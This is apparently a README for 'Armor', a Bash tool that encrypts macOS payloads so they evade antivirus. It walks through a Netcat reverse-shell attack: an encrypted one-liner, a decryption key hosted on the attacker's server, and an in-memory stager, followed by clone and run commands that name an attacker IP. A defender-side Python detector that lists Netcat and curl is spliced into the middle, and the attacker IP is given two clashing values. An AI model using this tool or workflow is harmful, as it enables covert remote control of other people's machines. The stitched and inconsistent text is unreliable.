Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus
scanners. Below is an example GIF of Armor being used with a simple Netcat payload.
A Netcat listener is started on port 4444. The "payload.txt" file is read and shown to contain a simple Bash one-liner that, when executed, will create a TCP connection between the target MacBook and the attacker's Netcat listener. Armor is used to encrypt the Bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stager is executed on the target MacBook (not shown in the GIF), the Bash one-liner is decrypted and executed without writing any data to the hard drive. Ncat immediately terminates the listener after the key has been used. When the Netcat connection is established, the attacker has remote access to the target MacBook.
Admittedly, encrypting most macOS-specific payloads is overkill. This particular Bash one-liner is capable of bypassing antivirus without the help of Armor. But this is just an example. The same degree of obfuscation can be applied to sophisticated Python, Ruby, and Shell scripts designed to execute a variety of advanced attacks.
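Added example (not code from Armor or its author): a defender-side heuristic for the chain described above, in which a key is fetched over the network, a blob is decrypted with openssl, and an interpreter runs the result from stdin. The event format, the process-name lists and the sibling-process correlation are assumptions, and the sample telemetry is constructed.

```python
import shlex
from collections import defaultdict

# Assumed process names; tune to your fleet.
NET_CLIENTS = {"ncat", "nc", "curl", "wget"}
INTERPRETERS = {"bash", "sh", "zsh", "python", "python3", "ruby"}
CHAIN = {"fetch", "decrypt", "exec_stdin"}

def classify(argv):
    """Return the role a process plays in a fetch-decrypt-execute chain, or None."""
    if not argv:
        return None
    name = argv[0].rsplit("/", 1)[-1]
    if name in NET_CLIENTS:
        return "fetch"
    if name == "openssl" and "-d" in argv[1:]:
        return "decrypt"
    # An interpreter with no script path argument reads its code from stdin,
    # which is how a payload runs without touching disk.
    if name in INTERPRETERS and all(a.startswith("-") for a in argv[1:]):
        return "exec_stdin"
    return None

def find_chains(events):
    """events: (ppid, pid, cmdline) tuples. Return parent PIDs whose
    children together cover all three roles."""
    roles = defaultdict(set)
    for ppid, _pid, cmdline in events:
        role = classify(shlex.split(cmdline))
        if role:
            roles[ppid].add(role)
    return sorted(p for p, seen in roles.items() if seen == CHAIN)

# Constructed sample telemetry (hypothetical hosts and PIDs).
SAMPLE_EVENTS = [
    (500, 501, "/usr/bin/ncat --ssl 192.0.2.10 443"),
    (500, 502, "/usr/bin/openssl enc -d -aes-256-cbc -a"),
    (500, 503, "/bin/bash"),
    (600, 601, "/usr/bin/curl -O https://example.com/tool.tgz"),
    (600, 602, "/bin/bash install.sh"),
    (700, 701, "/usr/bin/openssl enc -d -aes-256-cbc -in backup.enc -out backup.tar"),
]

if __name__ == "__main__":
    print(find_chains(SAMPLE_EVENTS))
```

Only the parent whose children include all three roles is reported; a download followed by running a script from disk, or a standalone file decryption, is not.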
Armor relies on LibreSSL to encrypt the input file and create the SSL certificate. If LibreSSL is not found on your system, Armor will attempt to install it. The function for this can be found in the armor.sh file. Ncat is also a dependency and can be installed in Kali using
$ apt-get update && apt-get install nmap
Armor can be cloned and executed using the below commands.
git clone https://github.com/tokyoneon/Armor
cd Armor
chmod +x armor.sh
./armor.sh /path/to/payload.txt 184.108.40.206 443
The 220.127.116.11 address is the attacker's IP address where the decryption key will be hosted. This can be a local IP address or VPS. The port number (443) is arbitrary and can be changed as needed.
Questions and issues: